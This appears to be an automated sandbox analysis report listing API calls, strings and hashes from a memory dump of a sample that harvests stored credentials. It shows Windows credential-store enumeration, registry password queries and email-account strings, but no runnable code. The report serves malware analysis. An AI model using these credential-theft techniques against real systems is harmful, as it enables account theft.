                                                                                            • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                            • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                            • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                            • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                            • API String ID: 2449869053-232097475
                                                                                            • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                            • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                            • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                            • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • sprintf.MSVCRT ref: 0040957B
                                                                                            • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                              • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                              • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                              • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                              • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                            • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                            • sprintf.MSVCRT ref: 004095EB
                                                                                            • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                            • memset.MSVCRT ref: 0040961C
                                                                                            • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                            • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                            • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                            • String ID: caption$dialog_%d$menu_%d
                                                                                            • API String ID: 3259144588-3822380221
                                                                                            • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                            • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                            • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                            • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                            • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                            • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                            • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                            • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                            • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                                            • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                            • API String ID: 2449869053-4258758744
                                                                                            • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                            • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                            • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                            • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                            • memset.MSVCRT ref: 0040F84A
                                                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                            • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                            • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                            • String ID: Creds$ps:password
                                                                                            • API String ID: 551151806-1872227768
                                                                                            • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                            • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                            • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                            • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • wcsstr.MSVCRT ref: 0040426A
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                            • _mbscpy.MSVCRT ref: 004042D5
                                                                                            • _mbscpy.MSVCRT ref: 004042E8
                                                                                            • strchr.MSVCRT ref: 004042F6
                                                                                            • strlen.MSVCRT ref: 0040430A
                                                                                            • sprintf.MSVCRT ref: 0040432B
                                                                                            • strchr.MSVCRT ref: 0040433C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                            • String ID: %s@gmail.com$www.google.com
                                                                                            • API String ID: 3866421160-4070641962
                                                                                            • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                            • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                            • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                            • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • _mbscpy.MSVCRT ref: 00409749
                                                                                            • _mbscpy.MSVCRT ref: 00409759
                                                                                              • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                              • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                              • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                            • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                            • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                            • _mbscpy.MSVCRT ref: 004097A1
                                                                                            • memset.MSVCRT ref: 004097BD
                                                                                            • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                              • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                            • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                            • API String ID: 1035899707-3647959541
                                                                                            • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                            • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                            • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                            • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                            • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                            • API String ID: 2360744853-2229823034
                                                                                            • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                            • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                            • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                            • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • strchr.MSVCRT ref: 004100E4
                                                                                            • _mbscpy.MSVCRT ref: 004100F2
                                                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                              • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                            • _mbscpy.MSVCRT ref: 00410142
                                                                                            • _mbscat.MSVCRT ref: 0041014D
                                                                                            • memset.MSVCRT ref: 00410129
                                                                                              • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                              • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                                                                            • memset.MSVCRT ref: 00410171
                                                                                            • memcpy.MSVCRT ref: 0041018C
                                                                                            • _mbscat.MSVCRT ref: 00410197
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                            • String ID: \systemroot
                                                                                            • API String ID: 912701516-1821301763
                                                                                            • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                            • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                            • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                            • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$strlen
                                                                                            • String ID: -journal$-wal$immutable$nolock
                                                                                            • API String ID: 2619041689-3408036318
                                                                                            • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                            • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                            • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                            • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                            • wcslen.MSVCRT ref: 0040874A
                                                                                            • _wcsncoll.MSVCRT ref: 00408794
                                                                                            • memset.MSVCRT ref: 0040882A
                                                                                            • memcpy.MSVCRT ref: 00408849
                                                                                            • wcschr.MSVCRT ref: 0040889F
                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                                                                            • String ID: J$Microsoft_WinInet
                                                                                            • API String ID: 2203907242-260894208
                                                                                            • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                            • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                            • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                            • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                            • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                            • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                            • memcpy.MSVCRT ref: 00410961
                                                                                            Strings
                                                                                            • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                            • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                            • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                            • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FromStringUuid$memcpy
                                                                                            • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                            • API String ID: 2859077140-2022683286
                                                                                            • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                            • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                            • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                            • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                            • _mbscpy.MSVCRT ref: 00409686
                                                                                            • _mbscpy.MSVCRT ref: 00409696
                                                                                            • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                              • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                            • API String ID: 888011440-2039793938
                                                                                            • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                            • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                            • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                            • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                            • strchr.MSVCRT ref: 0040327B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileStringstrchr
                                                                                            • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                            • API String ID: 1348940319-1729847305
                                                                                            • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                            • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                            • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                            • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                            • API String ID: 3510742995-3273207271
                                                                                            • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                            • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                            • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                            • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                              • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                              • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                                                                                            • strchr.MSVCRT ref: 0040371F
                                                                                            • _mbscpy.MSVCRT ref: 00403748
                                                                                            • _mbscpy.MSVCRT ref: 00403758
                                                                                            • strlen.MSVCRT ref: 00403778
                                                                                            • sprintf.MSVCRT ref: 0040379C
                                                                                            • _mbscpy.MSVCRT ref: 004037B2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                                                                            • String ID: %s@gmail.com
                                                                                            • API String ID: 500647785-4097000612
                                                                                            • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                            • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                            • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                            • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004094C8
                                                                                            • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                            • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                            • memset.MSVCRT ref: 0040950C
                                                                                            • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                            • _strcmpi.MSVCRT ref: 00409531
                                                                                              • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                            • String ID: sysdatetimepick32
                                                                                            • API String ID: 3411445237-4169760276
                                                                                            • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                            • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                            • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                            • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                            • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                            • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                            • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                            • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                            • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                            • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                            • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                            • String ID:
                                                                                            • API String ID: 3642520215-0
                                                                                            • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                            • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                            • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                            • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                            • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                            • GetDC.USER32(00000000), ref: 004072FB
                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                            • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                            • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                            • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                            • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
